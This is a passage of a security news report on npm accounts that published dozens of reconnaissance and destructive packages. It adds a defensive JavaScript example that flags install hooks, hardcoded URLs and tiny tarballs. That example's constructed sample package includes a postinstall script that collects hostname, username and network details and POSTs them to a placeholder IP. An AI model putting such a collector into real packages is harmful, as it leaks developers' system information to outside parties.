The accounts are now defunct: The first three malicious packages, "e-learning-garena," "seatalk-rn-leave-calendar," and "coral-web-be," were published under the npm accounts bbbb335656, cdsfdfafd1232436437, and sdsds656565, respectively. Each of the three accounts went on to publish twenty malicious packages.

According to Socket, the first package emerged eleven days earlier, and the most recent appeared only hours before the disclosure was published, confirming the operation was still underway at the time. An npm search at the time of writing, however, suggested the accounts had been removed from npm; none of the packages flagged in the Socket research could be found through the search either.

While they were live on npm, the packages' combined downloads were reported to have exceeded 3,000, which Socket said would have given the threat actors a "growing map of developer and enterprise networks" for future intrusions.

Multiple npm abuses discovered within days: npm, the default package registry for JavaScript, has become an attacker favorite because of its unmatched reach into developer workflows, which makes it a strong vector for large-scale supply chain attacks.

Earlier this week, Socket also discovered a collection of malicious npm packages that had sat undetected on npm for over two years and that target widely used JavaScript frameworks and libraries, including React, Vue.js, Vite, Node.js, and the open-source Quill Editor. Masquerading as harmless plugins and utilities, the packages carried destructive payloads meant to corrupt data, wipe critical files, and crash systems.

Since their upload, they have accumulated more than 6,200 downloads, escaping detection and slipping into unsuspecting developer environments.

"The threat actor behind this campaign, using the npm alias xuxingfeng with a registration email 1634389031@qq[.]com, has published eight packages designed to cause widespread damage across the JavaScript ecosystem," said Socket researcher Kush Pandya in a blog post. "Notably, the same account has also published several legitimate, non-malicious packages that function as advertised."

Earlier this month, hackers were found abusing npm to target developers across multiple languages with typo-squatted packages carrying infostealer and remote code execution (RCE) payloads.

Boychenko advised applying standard hygiene when managing dependencies from npm. He recommended using dependency-scanning tools to flag post-install hooks, hardcoded URLs, and unusually small tar archives, in addition to hardening the development pipeline with automated security checks. Install-time hooks deserve particular attention because npm runs them automatically on the developer's machine during a plain npm install, before any of the package's code is ever imported.
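The following is an added example of the triage the recommendation above describes; it is not code from the article, from Socket, or from any of the packages discussed. It checks a parsed package.json, the published tarball size, and the shipped source files for the three signals named (install-time hooks, hardcoded endpoints, an unusually small archive) and turns them into a verdict. The size threshold, the package names, the file contents, and the 203.0.113.7 collector address are all constructed assumptions chosen for illustration.

```javascript
// Added example (not from the article or Socket): minimal triage of an npm
// package using the three heuristics recommended in the text. Thresholds,
// sample manifests and file contents below are constructed assumptions.

const URL_RE = /\b(?:https?|wss?|ftp):\/\/[^\s"')]+/gi;
const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b/g;
// Lifecycle scripts npm runs automatically when a consumer installs the package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Assumed threshold: a real library is rarely this small; a tarball that is
// little more than package.json plus one script exists to run that script.
const SMALL_TARBALL_BYTES = 4096;

function findNetworkTargets(text) {
  const hits = new Set();
  for (const m of text.match(URL_RE) || []) hits.add(m);
  for (const m of text.match(IPV4_RE) || []) hits.add(m);
  return [...hits];
}

// pkg: parsed package.json; tarballBytes: size of the published .tgz;
// files: { path: contents } for source files extracted from the tarball.
function auditPackage(pkg, tarballBytes, files = {}) {
  const findings = [];
  const scripts = pkg.scripts || {};

  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ rule: "install-hook", where: hook, detail: scripts[hook] });
    }
  }

  // Hardcoded endpoints in the hook commands themselves (curl/wget one-liners)...
  for (const [name, cmd] of Object.entries(scripts)) {
    for (const target of findNetworkTargets(cmd)) {
      findings.push({ rule: "hardcoded-url", where: `scripts.${name}`, detail: target });
    }
  }
  // ...and in the shipped source that the hook may execute.
  for (const [path, contents] of Object.entries(files)) {
    for (const target of findNetworkTargets(contents)) {
      findings.push({ rule: "hardcoded-url", where: path, detail: target });
    }
  }

  if (tarballBytes < SMALL_TARBALL_BYTES) {
    findings.push({ rule: "small-tarball", where: "tarball", detail: `${tarballBytes} bytes` });
  }
  return findings;
}

// An install hook on its own is common in legitimate packages (native builds);
// combined with a hardcoded endpoint or a tiny tarball it warrants blocking.
function verdict(findings) {
  const rules = new Set(findings.map((f) => f.rule));
  if (rules.has("install-hook") && rules.size > 1) return "block";
  if (rules.size > 0) return "review";
  return "ok";
}

// Constructed sample: a recon-style package (name, script and address invented;
// 203.0.113.7 is a documentation-only address).
const suspiciousPkg = {
  name: "acme-internal-utils",
  version: "1.0.3",
  scripts: { postinstall: "node collect.js" },
};
const suspiciousFiles = {
  "collect.js":
    "const os = require('os');\n" +
    "const data = { host: os.hostname(), user: os.userInfo().username, ifaces: os.networkInterfaces() };\n" +
    "fetch('https://203.0.113.7:8443/ingest', { method: 'POST', body: JSON.stringify(data) });\n",
};

// Constructed sample: a benign package whose only signal is a native build step.
const benignPkg = {
  name: "acme-fast-hash",
  version: "2.4.0",
  scripts: { install: "node-gyp rebuild", test: "node test.js" },
};

const suspiciousFindings = auditPackage(suspiciousPkg, 1310, suspiciousFiles);
console.log(verdict(suspiciousFindings), suspiciousFindings);
console.log(verdict(auditPackage(benignPkg, 184320, {})));
```

In practice the package.json, tarball size and file listing would come from npm view and a downloaded .tgz; the point of the verdict logic is that an install hook alone produces a review, not a block, since native modules use the same mechanism, while a hook paired with a hardcoded endpoint or a near-empty archive is the combination the campaigns above relied on.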
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3995813/hackers-drop-60-npm-bombs-in-less-than-two-weeks-to-recon-dev-machines.html

